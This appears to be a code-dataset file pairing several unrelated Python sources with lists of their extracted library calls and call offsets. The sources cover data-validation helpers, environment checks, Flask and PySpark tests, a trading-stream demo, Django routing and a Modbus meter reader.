bound = np.append(minima.reshape(1, -1), maxima.reshape(1, -1), axis=0)
return bound
elif bound is not None and X is not None:
if np.any(np.logical_or(bound[0] > X, X > bound[1])):
warnings.warn("`X` contains values not within range of `bound`.")
return bound
elif bound is not None:
return bound
else:
raise ValueError("`X` or `bound` must not be None.")
def check_budget_manager(
budget,
budget_manager,
default_budget_manager_class,
default_budget_manager_dict=None,
):
"""Validate if budget manager is a budgetmanager class and create a
copy 'budget_manager_'.
"""
if default_budget_manager_dict is None:
default_budget_manager_dict = {}
if budget_manager is None:
budget_manager_ = default_budget_manager_class(
budget=budget, **default_budget_manager_dict
)
else:
if budget is not None and budget != budget_manager.budget:
warnings.warn(
"budgetmanager is already given such that the budget "
"is not used. The given budget differs from the "
"budget_managers budget."
)
budget_manager_ = copy.deepcopy(budget_manager)
return budget_manager_
|
[
"numpy.sum",
"numpy.ones",
"sklearn.utils.validation.check_consistent_length",
"numpy.diag",
"numpy.unique",
"numpy.random.RandomState",
"numpy.max",
"inspect.signature",
"sklearn.utils.validation.check_array",
"copy.deepcopy",
"sklearn.utils.validation.column_or_1d",
"numpy.nanmax",
"numpy.isscalar",
"numpy.nanmin",
"numpy.any",
"sklearn.utils.validation.check_random_state",
"numpy.array",
"numpy.logical_or",
"sklearn.utils.validation.assert_all_finite",
"warnings.warn"
] |
[((5175, 5199), 'numpy.isscalar', 'np.isscalar', (['class_prior'], {}), '(class_prior)\n', (5186, 5199), True, 'import numpy as np\n'), ((17167, 17194), 'copy.deepcopy', 'copy.deepcopy', (['random_state'], {}), '(random_state)\n', (17180, 17194), False, 'import copy\n'), ((17214, 17254), 'sklearn.utils.validation.check_random_state', 'check_random_state_sklearn', (['random_state'], {}), '(random_state)\n', (17240, 17254), True, 'from sklearn.utils.validation import check_array, column_or_1d, assert_all_finite, check_consistent_length, check_random_state as check_random_state_sklearn\n'), ((17339, 17366), 'numpy.random.RandomState', 'np.random.RandomState', (['seed'], {}), '(seed)\n', (17360, 17366), True, 'import numpy as np\n'), ((18350, 18398), 'sklearn.utils.validation.check_array', 'check_array', (['indices'], {'dtype': 'int', 'ensure_2d': '(False)'}), '(indices, dtype=int, ensure_2d=False)\n', (18361, 18398), False, 'from sklearn.utils.validation import check_array, column_or_1d, assert_all_finite, check_consistent_length, check_random_state as check_random_state_sklearn\n'), ((18407, 18477), 'sklearn.utils.validation.check_array', 'check_array', (['A'], {'allow_nd': '(True)', 'force_all_finite': '(False)', 'ensure_2d': '(False)'}), '(A, allow_nd=True, force_all_finite=False, ensure_2d=False)\n', (18418, 18477), False, 'from sklearn.utils.validation import check_array, column_or_1d, assert_all_finite, check_consistent_length, check_random_state as check_random_state_sklearn\n'), ((5373, 5408), 'numpy.array', 'np.array', (['([class_prior] * n_classes)'], {}), '([class_prior] * n_classes)\n', (5381, 5408), True, 'import numpy as np\n'), ((5441, 5482), 'sklearn.utils.validation.check_array', 'check_array', (['class_prior'], {'ensure_2d': '(False)'}), '(class_prior, ensure_2d=False)\n', (5452, 5482), False, 'from sklearn.utils.validation import check_array, column_or_1d, assert_all_finite, check_consistent_length, check_random_state as check_random_state_sklearn\n'), ((5505, 5528), 'numpy.sum', 'np.sum', (['(class_prior < 0)'], {}), '(class_prior < 0)\n', (5511, 5528), True, 'import numpy as np\n'), ((6906, 6940), 'numpy.array', 'np.array', (['cost_matrix'], {'dtype': 'float'}), '(cost_matrix, dtype=float)\n', (6914, 6940), True, 'import numpy as np\n'), ((7191, 7218), 'numpy.sum', 'np.sum', (['(cost_matrix_new < 0)'], {}), '(cost_matrix_new < 0)\n', (7197, 7218), True, 'import numpy as np\n'), ((13632, 13948), 'sklearn.utils.validation.check_array', 'check_array', (['X'], {'accept_sparse': 'accept_sparse', 'accept_large_sparse': 'accept_large_sparse', 'dtype': 'dtype', 'order': 'order', 'copy': 'copy', 'force_all_finite': 'force_all_finite', 'ensure_2d': 'ensure_2d', 'allow_nd': 'allow_nd', 'ensure_min_samples': 'ensure_min_samples', 'ensure_min_features': 'ensure_min_features', 'estimator': 'estimator'}), '(X, accept_sparse=accept_sparse, accept_large_sparse=\n accept_large_sparse, dtype=dtype, order=order, copy=copy,\n force_all_finite=force_all_finite, ensure_2d=ensure_2d, allow_nd=\n allow_nd, ensure_min_samples=ensure_min_samples, ensure_min_features=\n ensure_min_features, estimator=estimator)\n', (13643, 13948), False, 'from sklearn.utils.validation import check_array, column_or_1d, assert_all_finite, check_consistent_length, check_random_state as check_random_state_sklearn\n'), ((14573, 14602), 'sklearn.utils.validation.check_consistent_length', 'check_consistent_length', (['X', 'y'], {}), '(X, y)\n', (14596, 14602), False, 'from sklearn.utils.validation import check_array, column_or_1d, assert_all_finite, check_consistent_length, check_random_state as check_random_state_sklearn\n'), ((14706, 14749), 'sklearn.utils.validation.check_array', 'check_array', (['sample_weight'], {'ensure_2d': '(False)'}), '(sample_weight, ensure_2d=False)\n', (14717, 14749), False, 'from sklearn.utils.validation import check_array, column_or_1d, assert_all_finite, check_consistent_length, check_random_state as check_random_state_sklearn\n'), ((14758, 14799), 'sklearn.utils.validation.check_consistent_length', 'check_consistent_length', (['y', 'sample_weight'], {}), '(y, sample_weight)\n', (14781, 14799), False, 'from sklearn.utils.validation import check_array, column_or_1d, assert_all_finite, check_consistent_length, check_random_state as check_random_state_sklearn\n'), ((15062, 15383), 'sklearn.utils.validation.check_array', 'check_array', (['X_cand'], {'accept_sparse': 'accept_sparse', 'accept_large_sparse': 'accept_large_sparse', 'dtype': 'dtype', 'order': 'order', 'copy': 'copy', 'force_all_finite': 'force_all_finite', 'ensure_2d': 'ensure_2d', 'allow_nd': 'allow_nd', 'ensure_min_samples': 'ensure_min_samples', 'ensure_min_features': 'ensure_min_features', 'estimator': 'estimator'}), '(X_cand, accept_sparse=accept_sparse, accept_large_sparse=\n accept_large_sparse, dtype=dtype, order=order, copy=copy,\n force_all_finite=force_all_finite, ensure_2d=ensure_2d, allow_nd=\n allow_nd, ensure_min_samples=ensure_min_samples, ensure_min_features=\n ensure_min_features, estimator=estimator)\n', (15073, 15383), False, 'from sklearn.utils.validation import check_array, column_or_1d, assert_all_finite, check_consistent_length, check_random_state as check_random_state_sklearn\n'), ((15863, 15911), 'sklearn.utils.validation.check_array', 'check_array', (['sample_weight_cand'], {'ensure_2d': '(False)'}), '(sample_weight_cand, ensure_2d=False)\n', (15874, 15911), False, 'from sklearn.utils.validation import check_array, column_or_1d, assert_all_finite, check_consistent_length, check_random_state as check_random_state_sklearn\n'), ((15920, 15971), 'sklearn.utils.validation.check_consistent_length', 'check_consistent_length', (['X_cand', 'sample_weight_cand'], {}), '(X_cand, sample_weight_cand)\n', (15943, 15971), False, 'from sklearn.utils.validation import check_array, column_or_1d, assert_all_finite, check_consistent_length, check_random_state as check_random_state_sklearn\n'), ((17006, 17046), 'sklearn.utils.validation.check_random_state', 'check_random_state_sklearn', (['random_state'], {}), '(random_state)\n', (17032, 17046), True, 'from sklearn.utils.validation import check_array, column_or_1d, assert_all_finite, check_consistent_length, check_random_state as check_random_state_sklearn\n'), ((20312, 20343), 'numpy.any', 'np.any', (['(indices >= A.shape[dim])'], {}), '(indices >= A.shape[dim])\n', (20318, 20343), True, 'import numpy as np\n'), ((25798, 25812), 'sklearn.utils.validation.check_array', 'check_array', (['X'], {}), '(X)\n', (25809, 25812), False, 'from sklearn.utils.validation import check_array, column_or_1d, assert_all_finite, check_consistent_length, check_random_state as check_random_state_sklearn\n'), ((26056, 26074), 'sklearn.utils.validation.check_array', 'check_array', (['bound'], {}), '(bound)\n', (26067, 26074), False, 'from sklearn.utils.validation import check_array, column_or_1d, assert_all_finite, check_consistent_length, check_random_state as check_random_state_sklearn\n'), ((27724, 27753), 'copy.deepcopy', 'copy.deepcopy', (['budget_manager'], {}), '(budget_manager)\n', (27737, 27753), False, 'import copy\n'), ((3193, 3210), 'numpy.array', 'np.array', (['classes'], {}), '(classes)\n', (3201, 3210), True, 'import numpy as np\n'), ((7401, 7463), 'warnings.warn', 'warnings.warn', (['"""\'cost_matrix\' contains negative cost entries."""'], {}), '("\'cost_matrix\' contains negative cost entries.")\n', (7414, 7463), False, 'import warnings\n'), ((7490, 7518), 'numpy.sum', 'np.sum', (['(cost_matrix_new != 0)'], {}), '(cost_matrix_new != 0)\n', (7496, 7518), True, 'import numpy as np\n'), ((7723, 7795), 'warnings.warn', 'warnings.warn', (['"""\'cost_matrix\' contains contains no non-zero cost entry."""'], {}), '("\'cost_matrix\' contains contains no non-zero cost entry.")\n', (7736, 7795), False, 'import warnings\n'), ((8085, 8163), 'warnings.warn', 'warnings.warn', (['"""\'cost_matrix\' contains non-zero cost entries on its diagonal."""'], {}), '("\'cost_matrix\' contains non-zero cost entries on its diagonal.")\n', (8098, 8163), False, 'import warnings\n'), ((14148, 14239), 'sklearn.utils.validation.check_array', 'check_array', (['y'], {'accept_sparse': '"""csr"""', 'force_all_finite': '(True)', 'ensure_2d': '(False)', 'dtype': 'None'}), "(y, accept_sparse='csr', force_all_finite=True, ensure_2d=False,\n dtype=None)\n", (14159, 14239), False, 'from sklearn.utils.validation import check_array, column_or_1d, assert_all_finite, check_consistent_length, check_random_state as check_random_state_sklearn\n'), ((14361, 14387), 'sklearn.utils.validation.column_or_1d', 'column_or_1d', (['y'], {'warn': '(True)'}), '(y, warn=True)\n', (14373, 14387), False, 'from sklearn.utils.validation import check_array, column_or_1d, assert_all_finite, check_consistent_length, check_random_state as check_random_state_sklearn\n'), ((14400, 14441), 'sklearn.utils.validation.assert_all_finite', 'assert_all_finite', (['y'], {'allow_nan': 'allow_nan'}), '(y, allow_nan=allow_nan)\n', (14417, 14441), False, 'from sklearn.utils.validation import check_array, column_or_1d, assert_all_finite, check_consistent_length, check_random_state as check_random_state_sklearn\n'), ((14665, 14681), 'numpy.ones', 'np.ones', (['y.shape'], {}), '(y.shape)\n', (14672, 14681), True, 'import numpy as np\n'), ((14971, 15016), 'sklearn.utils.validation.check_consistent_length', 'check_consistent_length', (['y.T', 'sample_weight.T'], {}), '(y.T, sample_weight.T)\n', (14994, 15016), False, 'from sklearn.utils.validation import check_array, column_or_1d, assert_all_finite, check_consistent_length, check_random_state as check_random_state_sklearn\n'), ((19826, 19863), 'numpy.any', 'np.any', (['(indices[i] >= A.shape[dim[i]])'], {}), '(indices[i] >= A.shape[dim[i]])\n', (19832, 19863), True, 'import numpy as np\n'), ((26412, 26432), 'numpy.nanmin', 'np.nanmin', (['X'], {'axis': '(0)'}), '(X, axis=0)\n', (26421, 26432), True, 'import numpy as np\n'), ((26460, 26480), 'numpy.nanmax', 'np.nanmax', (['X'], {'axis': '(0)'}), '(X, axis=0)\n', (26469, 26480), True, 'import numpy as np\n'), ((27490, 27639), 'warnings.warn', 'warnings.warn', (['"""budgetmanager is already given such that the budget is not used. The given budget differs from the budget_managers budget."""'], {}), "(\n 'budgetmanager is already given such that the budget is not used. The given budget differs from the budget_managers budget.'\n )\n", (27503, 27639), False, 'import warnings\n'), ((7840, 7864), 'numpy.diag', 'np.diag', (['cost_matrix_new'], {}), '(cost_matrix_new)\n', (7847, 7864), True, 'import numpy as np\n'), ((18576, 18594), 'numpy.unique', 'np.unique', (['indices'], {}), '(indices)\n', (18585, 18594), True, 'import numpy as np\n'), ((18645, 18671), 'numpy.unique', 'np.unique', (['indices'], {'axis': '(0)'}), '(indices, axis=0)\n', (18654, 18671), True, 'import numpy as np\n'), ((18929, 18947), 'numpy.unique', 'np.unique', (['indices'], {}), '(indices)\n', (18938, 18947), True, 'import numpy as np\n'), ((18984, 19010), 'numpy.unique', 'np.unique', (['indices'], {'axis': '(0)'}), '(indices, axis=0)\n', (18993, 19010), True, 'import numpy as np\n'), ((26656, 26697), 'numpy.logical_or', 'np.logical_or', (['(bound[0] > X)', '(X > bound[1])'], {}), '(bound[0] > X, X > bound[1])\n', (26669, 26697), True, 'import numpy as np\n'), ((26712, 26777), 'warnings.warn', 'warnings.warn', (['"""`X` contains values not within range of `bound`."""'], {}), "('`X` contains values not within range of `bound`.')\n", (26725, 26777), False, 'import warnings\n'), ((20448, 20463), 'numpy.max', 'np.max', (['indices'], {}), '(indices)\n', (20454, 20463), True, 'import numpy as np\n'), ((19985, 20003), 'numpy.max', 'np.max', (['indices[i]'], {}), '(indices[i])\n', (19991, 20003), True, 'import numpy as np\n'), ((24386, 24401), 'inspect.signature', 'signature', (['func'], {}), '(func)\n', (24395, 24401), False, 'from inspect import Parameter, signature\n')]
|
# Python application to test miniconda data science installation
import math
import os
import sys
libs = ["numpy", "pandas", "matplotlib", "sklearn", "skimage", "cv2",
"sqlalchemy", "bokeh", "nltk", "missingno", "geopandas", "wordcloud",
"lightgbm", "scipy", "xgboost", "catboost", "keras"]
def main():
print("Please wait, testing Python environment....")
test_is_python_35()
test_libs()
test_tensorflow()
test_keras()
def test_libs():
for x in libs:
try:
__import__(x)
except ImportError:
print("Testing {:s} -> FAIL".format(x))
continue
print("Testing {:s} -> OK".format(x))
def test_keras():
try:
import keras
except ImportError:
print("Testing keras -> FAIL")
return
print("Testing keras -> OK")
def test_tensorflow():
try:
import tensorflow
except ImportError:
print("Testing tensorflow -> FAIL")
return
print("Testing tensorflow -> OK")
def test_is_python_35():
major = sys.version_info.major
minor = sys.version_info.minor
if major == 3:
pass
else:
print("You are running Python {}, but we need Python {}.".format(major, 3))
print("Stopping here.")
#Stop here
sys.exit(1)
return None
# assert major == 3, "Stopping here - we need Python 3."
if minor >= 5:
print("Testing Python version-> py{}.{} OK".format(major, minor))
else:
print("Warning: You should be running Python 3.5 or newer, " +
"you have Python {}.{}.".format(major, minor))
main()
|
[
"sys.exit"
] |
[((1304, 1315), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (1312, 1315), False, 'import sys\n')]
|
"""
curl -i -X POST -H "Content-Type:application/json" http://localhost:5000/train -d '{"userName":"TEST1","dataset":[[-15, -57, 88, 50, 16, 83, 198, 16, -70],[202, -53, 140, 134, 0, 84, 165, -16, -15],[15, -67, 96, 108, 0, 79, 212, -16, -23],[16, -67, 126, 119, -15, 67, 258, -16, -16],[53, -65, 155, 59, 15, 65, 179, -16, 15],[56, -68, 104, 137, -16, 88, 382, 16, -70]], "dataset2":[[41, -47, 1065, -15, 85, 181, 892, 16, -15],[15, -15, 922, 164, 80, 488, 302, 67, 51],[448, 1770, 2118, 1348, 495, 117, 1286, 430, 633],[47, -34, 1405, 75, 49, 228, 1115, 89, 16],[550, 1080, 383, 321, 97, 350, 1420, 43, 1114],[89, 430, 1034, 97, 36, 112, 387, 57, 16]]}'
curl -i -X POST -H "Content-Type:application/json" http://localhost:5000/predict -d '{"userName":"DEMO1","dataset":[[200,27,102,80,-36,80,579,66,21,61,208,71,-110]]}'
"""
"""
curl -i -X POST -H "Content-Type:application/json" http://localhost:5000/register -d '{"userName":"TEST1","dataset":[[-15, -57, 88, 50, 16, 83, 198, 16, -70],[202, -53, 140, 134, 0, 84, 165, -16, -15],[15, -67, 96, 108, 0, 79, 212, -16, -23],[16, -67, 126, 119, -15, 67, 258, -16, -16],[53, -65, 155, 59, 15, 65, 179, -16, 15],[56, -68, 104, 137, -16, 88, 382, 16, -70]], "dataset2":[[41, -47, 1065, -15, 85, 181, 892, 16, -15],[15, -15, 922, 164, 80, 488, 302, 67, 51],[448, 1770, 2118, 1348, 495, 117, 1286, 430, 633],[47, -34, 1405, 75, 49, 228, 1115, 89, 16],[550, 1080, 383, 321, 97, 350, 1420, 43, 1114],[89, 430, 1034, 97, 36, 112, 387, 57, 16]]}'
curl -i -X POST -H "Content-Type:application/json" http://localhost:5000/login -d '{"userName":"DEMO1","dataset":[[200,27,102,80,-36,80,579,66,21,61,208,71,-110]]}'
curl -i -X POST -H "Content-Type:application/json" http://localhost:5000/train -d '{"userName":"test3", "password":""}'
"""
import os
import sys
import unittest
import json
import logging
sys.path.append("../src")
import app
class FlaskAppTest(unittest.TestCase):
def setUp(self):
self.client = app.app.test_client()
def tearDown(self):
pass
def test_register_login(self):
logging.debug("test_login:")
response = self.client.post('/register',
data=json.dumps({"userName":"DEMO1", "password":"<PASSWORD>","dataset":[[200,27,102,80,-36,80,579,66,21,61,208,71,-110],[200,27,102,80,-36,80,579,66,21,61,208,71,-110]]})
, content_type='application/json'
, follow_redirects=True)
self.assertEqual(response.status_code, 200)
logging.debug("test_login:")
response = self.client.post('/login',
data=json.dumps({"userName":"DEMO1", "password":"<PASSWORD>","dataset":[[200,27,102,80,-36,80,579,66,21,61,208,71,-110],[200,27,102,80,-36,80,579,66,21,61,208,71,-110]]})
, content_type='application/json'
, follow_redirects=True)
self.assertEqual(response.status_code, 200)
if __name__ == '__main__':
app.init_log()
unittest.main()
|
[
"sys.path.append",
"unittest.main",
"logging.debug",
"app.app.test_client",
"json.dumps",
"app.init_log"
] |
[((1851, 1876), 'sys.path.append', 'sys.path.append', (['"""../src"""'], {}), "('../src')\n", (1866, 1876), False, 'import sys\n'), ((2889, 2903), 'app.init_log', 'app.init_log', ([], {}), '()\n', (2901, 2903), False, 'import app\n'), ((2908, 2923), 'unittest.main', 'unittest.main', ([], {}), '()\n', (2921, 2923), False, 'import unittest\n'), ((1973, 1994), 'app.app.test_client', 'app.app.test_client', ([], {}), '()\n', (1992, 1994), False, 'import app\n'), ((2077, 2105), 'logging.debug', 'logging.debug', (['"""test_login:"""'], {}), "('test_login:')\n", (2090, 2105), False, 'import logging\n'), ((2470, 2498), 'logging.debug', 'logging.debug', (['"""test_login:"""'], {}), "('test_login:')\n", (2483, 2498), False, 'import logging\n'), ((2169, 2372), 'json.dumps', 'json.dumps', (["{'userName': 'DEMO1', 'password': '<PASSWORD>', 'dataset': [[200, 27, 102, \n 80, -36, 80, 579, 66, 21, 61, 208, 71, -110], [200, 27, 102, 80, -36, \n 80, 579, 66, 21, 61, 208, 71, -110]]}"], {}), "({'userName': 'DEMO1', 'password': '<PASSWORD>', 'dataset': [[200,\n 27, 102, 80, -36, 80, 579, 66, 21, 61, 208, 71, -110], [200, 27, 102, \n 80, -36, 80, 579, 66, 21, 61, 208, 71, -110]]})\n", (2179, 2372), False, 'import json\n'), ((2559, 2762), 'json.dumps', 'json.dumps', (["{'userName': 'DEMO1', 'password': '<PASSWORD>', 'dataset': [[200, 27, 102, \n 80, -36, 80, 579, 66, 21, 61, 208, 71, -110], [200, 27, 102, 80, -36, \n 80, 579, 66, 21, 61, 208, 71, -110]]}"], {}), "({'userName': 'DEMO1', 'password': '<PASSWORD>', 'dataset': [[200,\n 27, 102, 80, -36, 80, 579, 66, 21, 61, 208, 71, -110], [200, 27, 102, \n 80, -36, 80, 579, 66, 21, 61, 208, 71, -110]]})\n", (2569, 2762), False, 'import json\n')]
|
# -*- coding: utf-8 -*-
"""Simple demo of streaming transaction data."""
from oandapyV20 import API
from oandapyV20.exceptions import V20Error, StreamTerminated
from oandapyV20.endpoints.transactions import TransactionsStream
from exampleauth import exampleAuth
accountID, access_token = exampleAuth()
api = API(access_token=access_token, environment="practice")
s = TransactionsStream(accountID=accountID)
MAXTRANS = 10
print("read from stream until {} transactions received".format(MAXTRANS))
try:
n = 0
for R in api.request(s):
print(R)
n += 1
if n > MAXTRANS:
s.terminate("max transactions received")
except StreamTerminated as e:
print("{}".format(e))
except V20Error as e:
print("Error: {}".format(e))
|
[
"oandapyV20.API",
"exampleauth.exampleAuth",
"oandapyV20.endpoints.transactions.TransactionsStream"
] |
[((289, 302), 'exampleauth.exampleAuth', 'exampleAuth', ([], {}), '()\n', (300, 302), False, 'from exampleauth import exampleAuth\n'), ((309, 363), 'oandapyV20.API', 'API', ([], {'access_token': 'access_token', 'environment': '"""practice"""'}), "(access_token=access_token, environment='practice')\n", (312, 363), False, 'from oandapyV20 import API\n'), ((369, 408), 'oandapyV20.endpoints.transactions.TransactionsStream', 'TransactionsStream', ([], {'accountID': 'accountID'}), '(accountID=accountID)\n', (387, 408), False, 'from oandapyV20.endpoints.transactions import TransactionsStream\n')]
|
import unittest
import yaml
from pyspark.sql import *
from dataforj import schema
from test.test_samples import flow_simple, simple_yaml_text, flow_complex
city_yaml_text = '''
- name: city
tests:
- not_null
- accepted_values: ['Amsterdam', 'Dublin', 'Frankfurt']
'''
flag_yaml_text = '''
- name: flag
tests:
- not_null
'''
combined_yaml_text = f'{city_yaml_text}\n{flag_yaml_text}'
spark = SparkSession \
.builder \
.appName("Unit Test") \
.getOrCreate()
ut_step_df = spark.createDataFrame(
[
('Amsterdam', True),
('Dublin', False),
],
['city', 'flag']
)
ut_bad_city_df = spark.createDataFrame(
[
('Amsterdam', True),
('New York', False)
],
['city', 'flag']
)
ut_bad_flag_df = spark.createDataFrame(
[
('Amsterdam', True),
('New York', None)
],
['city', 'flag']
)
class SchemaTest(unittest.TestCase):
def test_schema_two_fields(self):
'''Test to make sure two fields can be validated in the same YAML'''
schema_yaml = yaml.safe_load(combined_yaml_text)
schema.check_schema_yaml('ut_step_df', ut_step_df, schema_yaml)
def test_positive_accepted_values(self):
schema_yaml = yaml.safe_load(city_yaml_text)
schema.check_schema_yaml('ut_step_df', ut_step_df, schema_yaml)
def test_negative_accepted_values(self):
schema_yaml = yaml.safe_load(city_yaml_text)
with self.assertRaises(AssertionError) as excinfo:
schema.check_schema_yaml('ut_bad_city_df', ut_bad_city_df, schema_yaml)
self.assertEqual('Output of step [ut_bad_city_df] column [city] should only have values '
'in the accepted list [Amsterdam, Dublin, Frankfurt]. These values '
'were also found [\'New York\'].',
str(excinfo.exception))
def test_positive_null(self):
schema_yaml = yaml.safe_load(flag_yaml_text)
schema.check_schema_yaml('ut_step_df', ut_step_df, schema_yaml)
def test_negative_accepted_values(self):
schema_yaml = yaml.safe_load(flag_yaml_text)
with self.assertRaises(AssertionError) as excinfo:
schema.check_schema_yaml('ut_bad_flag_df', ut_bad_flag_df, schema_yaml)
self.assertEqual('Output of step ut_bad_flag_df column flag should not be null.',
str(excinfo.exception))
def test_check_schema(self):
'''Test to make sure we can read in the YAML file from the example project'''
schema.check_schema('ut_step_df', ut_step_df, 'example/schemas/filter_schema.yaml')
if __name__ == "__main__":
SchemaTest().test_check_schema()
|
[
"dataforj.schema.check_schema_yaml",
"dataforj.schema.check_schema",
"yaml.safe_load"
] |
[((1078, 1112), 'yaml.safe_load', 'yaml.safe_load', (['combined_yaml_text'], {}), '(combined_yaml_text)\n', (1092, 1112), False, 'import yaml\n'), ((1121, 1184), 'dataforj.schema.check_schema_yaml', 'schema.check_schema_yaml', (['"""ut_step_df"""', 'ut_step_df', 'schema_yaml'], {}), "('ut_step_df', ut_step_df, schema_yaml)\n", (1145, 1184), False, 'from dataforj import schema\n'), ((1253, 1283), 'yaml.safe_load', 'yaml.safe_load', (['city_yaml_text'], {}), '(city_yaml_text)\n', (1267, 1283), False, 'import yaml\n'), ((1292, 1355), 'dataforj.schema.check_schema_yaml', 'schema.check_schema_yaml', (['"""ut_step_df"""', 'ut_step_df', 'schema_yaml'], {}), "('ut_step_df', ut_step_df, schema_yaml)\n", (1316, 1355), False, 'from dataforj import schema\n'), ((1424, 1454), 'yaml.safe_load', 'yaml.safe_load', (['city_yaml_text'], {}), '(city_yaml_text)\n', (1438, 1454), False, 'import yaml\n'), ((1957, 1987), 'yaml.safe_load', 'yaml.safe_load', (['flag_yaml_text'], {}), '(flag_yaml_text)\n', (1971, 1987), False, 'import yaml\n'), ((1996, 2059), 'dataforj.schema.check_schema_yaml', 'schema.check_schema_yaml', (['"""ut_step_df"""', 'ut_step_df', 'schema_yaml'], {}), "('ut_step_df', ut_step_df, schema_yaml)\n", (2020, 2059), False, 'from dataforj import schema\n'), ((2128, 2158), 'yaml.safe_load', 'yaml.safe_load', (['flag_yaml_text'], {}), '(flag_yaml_text)\n', (2142, 2158), False, 'import yaml\n'), ((2570, 2657), 'dataforj.schema.check_schema', 'schema.check_schema', (['"""ut_step_df"""', 'ut_step_df', '"""example/schemas/filter_schema.yaml"""'], {}), "('ut_step_df', ut_step_df,\n 'example/schemas/filter_schema.yaml')\n", (2589, 2657), False, 'from dataforj import schema\n'), ((1526, 1597), 'dataforj.schema.check_schema_yaml', 'schema.check_schema_yaml', (['"""ut_bad_city_df"""', 'ut_bad_city_df', 'schema_yaml'], {}), "('ut_bad_city_df', ut_bad_city_df, schema_yaml)\n", (1550, 1597), False, 'from dataforj import schema\n'), ((2230, 2301), 'dataforj.schema.check_schema_yaml', 'schema.check_schema_yaml', (['"""ut_bad_flag_df"""', 'ut_bad_flag_df', 'schema_yaml'], {}), "('ut_bad_flag_df', ut_bad_flag_df, schema_yaml)\n", (2254, 2301), False, 'from dataforj import schema\n')]
|
from datetime import datetime, timedelta
from typing import Union
from .models.file import UploadUrlModel
from .cache import Cache
def format_route_name(name: str) -> str:
"""Used to format route name.
Parameters
----------
name : str
Returns
-------
str
"""
return name.replace("Route", "").lower()
class UploadUrlCache:
def __init__(self, bucket_id: str, file_id: str = None) -> None:
"""Used to handled cached upload URLs.
Parameters
----------
bucket_id : str
file_id : str, optional
by default None
Notes
-----
If file_id passed Cache.upload_parts_urls is used
instead of Cache.upload_urls.
"""
if not file_id:
self.upload_cache = Cache.upload_urls
self.index = bucket_id
else:
self.upload_cache = Cache.upload_parts_urls
self.index = bucket_id + file_id
def find(self) -> Union[None, "UploadUrlCache"]:
"""Looks for cached item.
Returns
-------
UploadUrlModel
"""
if self.index in self.upload_cache:
if datetime.now() >= self.upload_cache[self.index]["expires"]:
self.upload_cache.pop(self.index, None)
else:
return self.upload_cache[self.index]["model"]
def save(self, upload_model: UploadUrlModel) -> UploadUrlModel:
"""Saves upload model into cache.
Parameters
----------
upload_model : UploadUrlModel
Returns
-------
UploadUrlModel
"""
self.upload_cache[self.index] = {
"expires": datetime.now() + timedelta(hours=23, minutes=50),
"model": upload_model
}
return upload_model
def delete(self) -> None:
"""Deletes upload out of the cache.
"""
self.upload_cache.pop(self.index, None)
def encode_name(name: str, encoding: str = "utf-8",
replace: bool = True) -> str:
"""Used to encode names correctly for b2.
Parameters
----------
name : str
encoding : str, optional
by default "utf-8"
replace : bool, optional
by default True
Returns
-------
str
"""
if replace:
name = name.replace(" ", "-")
return name.encode(encoding).decode(encoding)
|
[
"datetime.datetime.now",
"datetime.timedelta"
] |
[((1184, 1198), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (1196, 1198), False, 'from datetime import datetime, timedelta\n'), ((1702, 1716), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (1714, 1716), False, 'from datetime import datetime, timedelta\n'), ((1719, 1750), 'datetime.timedelta', 'timedelta', ([], {'hours': '(23)', 'minutes': '(50)'}), '(hours=23, minutes=50)\n', (1728, 1750), False, 'from datetime import datetime, timedelta\n')]
|
from django.urls import path
from . import views
from os import name
from django.conf.urls.static import static
from django.conf import settings
urlpatterns=[
path('',views.welcome,name ='welcome'),
path('gallery/',views.pictures,name='pictures'),
path('search/', views.search_results, name='search_results'),
path('picture/<int:image_id>/',views.picture,name='imageid'),
]
if settings.DEBUG:
urlpatterns+= static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT)
|
[
"django.conf.urls.static.static",
"django.urls.path"
] |
[((164, 203), 'django.urls.path', 'path', (['""""""', 'views.welcome'], {'name': '"""welcome"""'}), "('', views.welcome, name='welcome')\n", (168, 203), False, 'from django.urls import path\n'), ((208, 257), 'django.urls.path', 'path', (['"""gallery/"""', 'views.pictures'], {'name': '"""pictures"""'}), "('gallery/', views.pictures, name='pictures')\n", (212, 257), False, 'from django.urls import path\n'), ((261, 321), 'django.urls.path', 'path', (['"""search/"""', 'views.search_results'], {'name': '"""search_results"""'}), "('search/', views.search_results, name='search_results')\n", (265, 321), False, 'from django.urls import path\n'), ((327, 389), 'django.urls.path', 'path', (['"""picture/<int:image_id>/"""', 'views.picture'], {'name': '"""imageid"""'}), "('picture/<int:image_id>/', views.picture, name='imageid')\n", (331, 389), False, 'from django.urls import path\n'), ((429, 490), 'django.conf.urls.static.static', 'static', (['settings.MEDIA_URL'], {'document_root': 'settings.MEDIA_ROOT'}), '(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n', (435, 490), False, 'from django.conf.urls.static import static\n')]
|
import mp_modbus_master as mmm
import time
import struct
d1 = mmm.modbus_rtu_master(uart_no=2, parity=0, tx_pin=12, rx_pin=13, en_pin=32)
l = {
"U" : {"register": 305, "desc": "Voltage", "type": "uint16", "gain": 100, "unit": "V"},
"I" : {"register": 313, "desc": "Current", "type": "int32", "gain": 1000, "unit": "A"},
"Power" : {"register": 320, "desc": "Power", "type": "int32", "gain": 1000, "unit": "kW"},
"Power_R" : {"register": 328, "desc": "Reactive Power", "type": "int32", "gain": 1000, "unit": "VA"},
"Power_A" : {"register": 336, "desc": "Apparent Power", "type": "int32", "gain": 1000, "unit": "VA"},
"Energie_Total_aktiv" : {"register": 40960, "desc": "Total Energy", "type": "int32", "gain": 100, "unit": "kWh"},
}
for i in range(3):
time.sleep(1)
for e in l:
try:
#time.sleep(0.1)
#print(e)
print(d1.uart.read(10))
if l[e]["type"] == "uint16":
f = d1.read_holding_registers_async(l[e]["register"], 1)
#print(f)
v = struct.unpack(">h", f.data)[0]/l[e]["gain"]
if l[e]["type"] == "int32":
f = d1.read_holding_registers(l[e]["register"], 2)
#print(f)
v = struct.unpack(">I", f.data)[0]/l[e]["gain"]
print("{}: {} {}".format(e, v, l[e]["unit"]))
except:
time.sleep(0.1)
print("ERROR")
print(d1.uart.read(10))
while d1.uart.any() > 0:
print(d1.uart.read(10))
|
[
"mp_modbus_master.modbus_rtu_master",
"struct.unpack",
"time.sleep"
] |
